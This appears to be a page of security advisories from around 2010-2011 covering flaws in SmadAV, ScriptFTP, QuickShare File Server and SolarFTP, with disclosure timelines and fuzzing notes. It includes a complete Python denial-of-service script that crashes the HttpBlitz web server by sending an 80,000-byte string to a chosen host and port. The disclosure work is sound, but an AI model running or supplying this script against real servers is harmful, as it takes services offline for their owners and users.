SmadAV 9.1 Null Pointer Dereference Vulnerability
SmadAV antivirus 9.1 is susceptible to null pointer exploitation. The application does not properly filter the scanner input that is passed into smadengine.dll. Successful exploitation of this vulnerability could potentially result in a crash of the application, since it dereferences a null pointer (EAX = 0000000).
ScriptFTP <=3.3 Remote Buffer Overflow Exploit (0day)
ScriptFTP client is vulnerable to a remote buffer overflow. The condition is triggered while processing a LIST FTP command of excessive length.
The vulnerability is confirmed in version 3.3. Other versions may also be affected.
ScriptFTP is an FTP client designed to automate file transfers. It follows the commands written in a text file (also called a script file) and performs the uploads or downloads automatically. Writing the script file is very easy; take a look at the script samples section.
ScriptFTP follows the commands written in a text file (also called a script file). Specifically, running ScriptFTP with a text file/script file that contains a GETLIST or GETFILE command with 3000 or more bytes of data may trigger an exception within the client, causing it to crash and leading to a stack overflow.
Proof of Concept
Fix and Update
The vendor was contacted and responded immediately after our first contact. They are planning a major rewrite, but no further information has been received from them so far. Do not connect to untrusted FTP servers. A fix or update is not available yet; we will update this post if the vendor fixes the bug.
Vendor Contact Log:
01/21/2011: Bug found
01/22/2011: Vendor contacted
01/24/2011: Vendor replied
03/07/2011: Update status to vendor
04/06/2011: Vendor received POC
05/17/2011: No further info, 1st reminder sent.
09/11/2011: No further info, 2nd reminder sent.
09/20/2011: No response, advisory released.
QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability
QuickShare File Server is prone to an FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system.
QuickShare File Server is an easy-to-use file sharing application that helps you build your own file server. Users can access your server through web browsers or FTP client software (in most cases, they do not need to install any extra software). Users can send large files to you or receive them from you. You can create accounts and set passwords to protect your files.
HttpBlitz Web Server Denial Of Service Exploit
#!/usr/bin/python
# Title: HttpBlitz DOS
# Date: 12/24/2010
# Author: otoy
# Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download
# Tested on: Windows XP SP3
#
# ======================================================================
# (digital-echidna ASCII-art banner; not recoverable from the page)
# http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to offsec, exploit-db, corelan team
#
#### Software description:
# A cross platform Http web server developed using C++. Agile methodology
# with emphasis on :- 1. Good Design 2. Object Oriented Programming 3.
# Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5.
# Software Engineering best practices.
#
#### DOS information:
# you just have to send long string, and it will crash the program.
# just scan the port using nmap will crash the program too.

import socket, sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
junk = "\x41" * 80000  # 80000 'A' bytes, the oversized request that crashes the server

def banner():
    print("\nHttpBlitz DOS.")
    print("By: otoy (otoy[at]digital-echidna[dot]org)\n")

# Expect exactly two arguments: target IP and port
if len(sys.argv) != 3:
    banner()
    print("Usage: %s <ip> <port>\n" % sys.argv[0])
    sys.exit(0)

try:
    s.connect((sys.argv[1], int(sys.argv[2])))
except socket.error:
    print("Can't connect to server!\n")
    sys.exit(0)

# Send the long string terminated by CRLF, then close the connection
s.send((junk + '\r\n').encode())
s.close()
SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input, resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, or ‘NLST’ command, a remote attacker can potentially disable the FTP service.
Solar FTP Server is a handy and easy-to-use personal FTP server with features like virtual directories, a simple and intuitive user interface, and real-time activity monitoring and management.
Testing and Fuzzing
Using Very Simple FTP Fuzzer, we tested the FTP server with various commands. The first command we sent was APPE (append). The Windows exception handler popped up, which verified that the server may be vulnerable to some commands.
Unfortunately, the junk we sent did not overwrite the SEH or the EIP; it just ended in a denial of service. In conclusion, there are four commands that make the server crash: APPE, NLST, PUT, and GET.